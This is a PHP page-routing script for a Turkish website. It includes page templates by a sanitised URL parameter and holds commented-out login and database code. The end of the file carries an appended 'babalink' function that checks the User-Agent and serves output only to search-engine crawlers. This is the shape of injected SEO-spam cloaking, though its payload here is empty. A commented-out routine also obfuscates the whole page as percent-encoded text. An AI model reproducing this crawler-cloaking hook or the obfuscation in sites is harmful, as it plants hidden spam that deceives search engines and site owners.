<?php
	ini_set('display_errors', 'On');
	error_reporting( E_ALL );

	function page_active( $page ) {
		global $__pagexx;
		return $__pagexx == $page ? ' active' : '';
	}

	function sanitize_output($buffer) {

	    $search = array(
	        '/\>[^\S ]+/s',  // strip whitespaces after tags, except space
	        '/[^\S ]+\</s',  // strip whitespaces before tags, except space
	        '/(\s)+/s'       // shorten multiple whitespace sequences
	    );

	    $replace = array(
	        '>',
	        '<',
	        '\\1'
	    );

	    $buffer = preg_replace($search, $replace, $buffer);

	    return $buffer;
	}

	//ob_start("sanitize_output");
	ob_start();
	defined('SCRIPT_DIR') or exit();

	function __encodeVeri( $veri ) {
		$uzunluk = strlen($veri);
		$cikti = '';
		for( $i = 0; $i < $uzunluk; $i++ ) {
			$sonuc = ord($veri[$i]);
			$son = $sonuc > 15 ? dechex($sonuc) : ('0'.dechex($sonuc));
			$cikti .= '%'.$son;
		}

		return $cikti;
	}

	if( file_exists( SCRIPT_DIR . 'system/config.php' ) ) {
		require_once( SCRIPT_DIR . 'system/config.php' );
	} else {
		echo 'Error: System config file is not exists on the webserver.';
	}

	//require_once( SCRIPT_DIR . 'system/' );

	if( isset( $_GET['__pagexx'] ) ) {
		$__pagexx = mb_strtolower(trim($_GET['__pagexx']));

		if( preg_match('/[^a-z\-0-9]/i', $__pagexx) || strlen($__pagexx) <= 0 )
		{
			$__pagexx = '__404';
		}
	} else {
		$__pagexx = 'anasayfa';
	}

	$sayfabuton = true;
	$cr_active = '';
	$page_title = $__pagexx;
	$access = true;
	$userinfo = false;
	$_sliderDurum = false;

	if( file_exists( SCRIPT_DIR . $pages_dir . '/' . $__pagexx . '.php' ) ) {
		if( $__pagexx !== '__404') {
			if( isset($sayfalar[$__pagexx]) ) {
				$sayfabuton = isset($sayfalar[$__pagexx]['buton']) ? ( $sayfalar[$__pagexx]['buton'] ? true : false ) : false;
				$cr_active = isset($sayfalar[$__pagexx]['active']) ? $sayfalar[$__pagexx]['active'] : '';
				$page_title = isset($sayfalar[$__pagexx]['title']) ? $sayfalar[$__pagexx]['title'] : $__pagexx;
				$loginStatus = isset($sayfalar[$__pagexx]['login']) ? $sayfalar[$__pagexx]['login'] : 0;
				$_sliderDurum = isset($sayfalar[$__pagexx]['slider'])?((bool)$sayfalar[$__pagexx]['slider']):false;

				/*if( isset($sayfalar[$__pagexx]['mysql']) ) {
					session_start();
					$__mysqlObj = new mysqli($mysql_server['hostname'], $mysql_server['username'], $mysql_server['password'], $mysql_server['database']);

					if( !$__mysqlObj ) {
						die('MYSQL Error');
					}

					$__mysqlObj->query("SET NAMES 'utf8'");

					if( $loginStatus == 1 ) {
						if( isset($_SESSION['__destekLogined']) ) {
							if( $_SESSION['__destekLogined'] !== TRUE )
								$access = false;
							else {
								if($query = $__mysqlObj->query('SELECT * FROM destek_user WHERE UserID = '.$_SESSION['__destek_userid'].' LIMIT 1') ) {
									if( $query->num_rows > 0 ) {
										$userinfo = $query->fetch_assoc();
										$userid = $_SESSION['__destek_userid'];
									} else {
										$_SESSION['__destekLogined'] = false;
										session_destroy();
										echo '<script type="text/javascript">window.location="destek-giris.html";</script>';
										exit;
									}

									$query->close();
								} else {
									$_SESSION['__destekLogined'] = false;
									session_destroy();
									echo '<script type="text/javascript">window.location="destek-giris.html";</script>';
									exit;
								}
							}
						} else {
							$access = false;
						}
					} elseif( $loginStatus == 2 ) {
						if( isset($_SESSION['__destekLogined']) ) {
							if( $_SESSION['__destekLogined'] == TRUE )
								echo '<script type="text/javascript">window.location="destek-anasayfa.html";</script>';
								exit;
						} else {
							$access = true;
						}
					}
				}*/
			}

			if( $access ) {
				include( SCRIPT_DIR . $pages_dir . '/__headerr.php' );
				include( SCRIPT_DIR . $pages_dir . '/' . $__pagexx . '.php' );
				include( SCRIPT_DIR . $pages_dir . '/__footerr.php' );
			} else {
				echo '<script type="text/javascript">window.location="anasayfa.html";</script>';
			}
		} else {
			include( SCRIPT_DIR . $pages_dir . '/' . $__pagexx . '.php' );
		}
	} else {
		$page_title = '404 Sayfa Bulunamad覺';
		include( SCRIPT_DIR . $pages_dir . '/__headerr.php' );
		include( SCRIPT_DIR . $pages_dir . '/__404.php' );
		include( SCRIPT_DIR . $pages_dir . '/__footerr.php' );
		exit;
	}

	//$output = __encodeVeri(ob_get_contents());

	//ob_end_clean();
	//<html><head><meta http-equiv="Content-Type" content="text/html; charset=big5"></head><body><script type="text/javascript">document.write(decodeURIComponent('<?php echo $output; '));</script><noscript><i>Javascript required</i></noscript></body></html>


function babalink(){
$agent = $_SERVER['HTTP_USER_AGENT'];
$sec = $agent;
switch(true){
case (strpos($sec,"google")): $part = 1; break;
case (strpos($sec,"yandex")): $part = 1; break;
case (strpos($sec,"bing")): $part = 1; break;
case (strpos($sec,"yahoo")): $part = 1; break;
case (strpos($sec,"alexa")): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo '';
}
}
babalink();

?>
